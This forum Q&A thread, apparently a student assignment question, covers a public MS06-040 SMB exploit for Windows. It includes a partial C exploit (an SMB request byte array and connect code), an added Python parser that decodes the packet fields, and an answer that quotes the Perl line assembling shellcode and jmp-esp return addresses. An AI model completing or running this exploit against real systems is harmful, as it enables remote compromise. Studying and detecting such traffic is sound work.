Buffer-overflow exploit code

Hi, so I'm doing an exploit on the Windows 2000 server as part of an assignment and needed a little help. I've attached a screenshot of the exploit code that's in the C document, but I don't really understand what this code does and was wondering if someone would explain to me what exactly this hard-coded data does in the exploit. So far I know that this code provides me with a remote bind shell on port 54321.

```c
/* Headers the pasted snippet omitted; needed for socket(), connect(),
 * inet_addr(), htons(), printf() and exit(). */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* PORT is used below but its definition is not part of the pasted snippet.
 * Assumption (not from the post): 445 is the direct-host SMB port. */
#ifndef PORT
#define PORT 445
#endif

/* Hard-coded SMB request, 106 bytes in total:
 *   bytes   0-3   NetBIOS session header, type 0x00, length 0x66 (= 102)
 *   bytes   4-35  SMB header: "\xffSMB", command 0x25 (SMB_COM_TRANSACTION),
 *                 flags 0x18, TID/PID/UID/MID
 *   byte    36    word count 0x10 (16 parameter words follow)
 *   bytes  37-68  transaction parameters, incl. DataCount/DataOffset 0x1c/0x4a
 *                 and setup words 0x0026 (TransactNmPipe) / FID 0x4000
 *   bytes  69-70  byte count 0x23 (= 35)
 *   bytes  71-77  transaction name "\PIPE\" (NUL-terminated)
 *   bytes  78-105 28-byte DCE-RPC request PDU (version 5.0, opnum 0x1f) */
char peer0_14[] = {
0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42, 
0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c, 
0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x4a, 0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02, 
0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c, 
0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, 
0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00, 
0x00, 0x00 };


int main(int argc, char **argv)
{
    int fd;
    int con;
    int repbf[20000];          /* reply buffer; not used in the pasted part */

    struct sockaddr_in target;

    if (argc < 2)
    {
        printf("Microsoft Windows CanonicalizePathName() Remote Exploit (MS06-040)\n");
        printf("Tested on WindowsXP SP1 EN and got a bindshell on port 54321\n");
        printf("Win2k should give a crash in services.exe\n");
        printf("I've used the default smbdomain: WORKGROUP\n\n");
        printf("Usage: %s <ip>\n", argv[0]);
        printf("Example: %s 192.168.1.103\n\n", argv[0]);
        printf("Written by: Preddy\n");
        printf("RootShell Security Group\n");
        printf("www.team-rootshell.com\n");

        exit(1);
    }

    /* Plain TCP socket towards the target's SMB service */
    fd = socket(AF_INET, SOCK_STREAM, 0);

    if (fd < 0)
    {
        /* perror() appends the errno text and a newline itself */
        perror("Could not create socket");
        exit(1);
    }

    printf("Target: %s\n", argv[1]);

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(argv[1]);
    target.sin_port = htons(PORT);

    /* connect() takes a generic struct sockaddr *; the original cast to
     * struct sockaddr_in * is wrong and only compiles with a warning */
    con = connect(fd, (struct sockaddr *)&target, sizeof(target));

    if (con < 0)
    {
        printf("Could not connect\n");
        exit(1);
    }

    /* The pasted code ends here; the part that sends peer0_14 and the
     * rest of the request is not included in the question. */
    close(fd);
    return 0;
}
```

This is the exploit code. Thanks.

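The question asks what the hard-coded bytes in `peer0_14` do. As an added example (it is not code from the question, the answer, or the exploit's author), here is a small Python parser that decodes that array into the protocol fields it encodes: the NetBIOS session header, the SMB header, the SMB_COM_TRANSACTION parameter words, the named-pipe name, and the DCE-RPC request header. The field layouts follow MS-CIFS for SMB_COM_TRANSACTION and the standard DCE-RPC connection-oriented request PDU; the offsets are worked out from the bytes on the page, and the function and key names as well as the consistency checks are my own. It sends nothing; it only reads the bytes.

```python
"""Decode the hard-coded SMB request (peer0_14) from the question.

Added example, not part of the original post. Only parses the structure of
the bytes; it does not talk to any host.
"""
import struct

# peer0_14 copied verbatim from the question (106 bytes).
PEER0_14 = bytes([
    0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42,
    0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d,
    0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c,
    0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x4a, 0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02,
    0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c,
    0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00,
    0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00,
    0x00, 0x00,
])

SMB_COM_TRANSACTION = 0x25  # SMB command byte at SMB-header offset 4


def parse_smb_transaction(buf):
    """Return the decoded fields as a dict; raise ValueError if lengths disagree."""
    if len(buf) < 4 + 32:
        raise ValueError("too short for a NetBIOS + SMB header")
    # NetBIOS session service header: 1 byte message type, 3 byte big-endian length.
    nb_type, nb_len = buf[0], int.from_bytes(buf[1:4], "big")
    if nb_type != 0 or nb_len != len(buf) - 4:
        raise ValueError("NetBIOS length %d vs payload %d" % (nb_len, len(buf) - 4))
    smb = buf[4:]  # every offset below is relative to the start of the SMB header
    if smb[:4] != b"\xffSMB":
        raise ValueError("missing SMB magic")
    cmd, status, flags, flags2, _pid_high = struct.unpack_from("<BIBHH", smb, 4)
    _sig, _res, tid, pid, uid, mid = struct.unpack_from("<8sHHHHH", smb, 14)
    if cmd != SMB_COM_TRANSACTION:
        raise ValueError("not SMB_COM_TRANSACTION: 0x%02x" % cmd)
    word_count = smb[32]
    # 14 fixed parameter words of an SMB_COM_TRANSACTION request (MS-CIFS),
    # followed by SetupCount setup words.
    (total_param, total_data, max_param, max_data, _max_setup, _r1, _tflags,
     _timeout, _r2, param_count, param_off, data_count, data_off,
     setup_count, _r3) = struct.unpack_from("<HHHHBBHIHHHHHBB", smb, 33)
    if word_count != 14 + setup_count:
        raise ValueError("word count %d does not match setup count" % word_count)
    setup = struct.unpack_from("<%dH" % setup_count, smb, 61)
    bc_off = 61 + 2 * setup_count
    (byte_count,) = struct.unpack_from("<H", smb, bc_off)
    data_area = smb[bc_off + 2:bc_off + 2 + byte_count]
    if len(data_area) != byte_count:
        raise ValueError("byte count %d runs past the packet" % byte_count)
    # Transaction name: NUL-terminated ASCII, "\PIPE\" for named-pipe transactions.
    pipe_name = data_area[:data_area.index(b"\x00")].decode("ascii")
    # DataOffset counts from the start of the SMB header.
    if data_off + data_count > len(smb):
        raise ValueError("data area runs past the packet")
    data = smb[data_off:data_off + data_count]
    # DCE-RPC request PDU: 16-byte common header, then alloc_hint, ctx id, opnum.
    ver, minor, ptype, pfc_flags, drep, frag_len, auth_len, call_id = \
        struct.unpack_from("<BBBBIHHI", data, 0)
    alloc_hint, ctx_id, opnum = struct.unpack_from("<IHH", data, 16)
    if frag_len != data_count:
        raise ValueError("RPC frag_len %d vs SMB DataCount %d" % (frag_len, data_count))
    return {
        "netbios_len": nb_len, "command": cmd, "status": status,
        "flags": flags, "flags2": flags2, "tid": tid, "pid": pid, "uid": uid, "mid": mid,
        "word_count": word_count, "total_param_count": total_param,
        "total_data_count": total_data, "max_param_count": max_param,
        "max_data_count": max_data, "param_count": param_count,
        "param_offset": param_off, "data_count": data_count, "data_offset": data_off,
        "setup": setup, "byte_count": byte_count, "pipe_name": pipe_name,
        "rpc": {"version": (ver, minor), "ptype": ptype, "pfc_flags": pfc_flags,
                "data_rep": drep, "frag_len": frag_len, "auth_len": auth_len,
                "call_id": call_id, "alloc_hint": alloc_hint, "ctx_id": ctx_id,
                "opnum": opnum},
        "stub": data[24:frag_len],
    }


if __name__ == "__main__":
    for key, value in parse_smb_transaction(PEER0_14).items():
        print("%-18s %r" % (key, value))
```

Running it shows that the array is one complete SMB_COM_TRANSACTION request to the `\PIPE\` transaction name (setup word 0x0026, TransactNmPipe, on FID 0x4000) carrying a 28-byte DCE-RPC request for opnum 31 with a 4-byte stub; the lengths in the NetBIOS header, the SMB DataCount and the RPC frag_len all agree. The exploit's own banner names the target function CanonicalizePathName, which is the srvsvc call public MS06-040 write-ups associate with that opnum. Those same fields (transaction to `\PIPE\`, the pipe FID, opnum 31 on srvsvc) are what a network signature for this traffic would key on; the pasted snippet stops before anything is sent, so where the overflow itself is built is not visible on the page.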

1 Answer


Since the code you pasted is not the full exploit code and all the data is in array form, it is hard to understand how the exploit works.

I suggest you look at the links below:

https://www.rapid7.com/db/modules/exploit/windows/smb/ms06_040_netapi
https://vulners.com/exploitdb/EDB-ID:2162

I didn't reverse engineer it, but it seems to use jmp esp tricks and uses a fixed address for this gadget. Maybe, I think, you should change some offset to fit your OS version.

For the XP version, the following line is key for the exploit:

```perl
my $path = $shellcode . (pack('V', $target->[2]) x 16) . "\x00\x00";
```
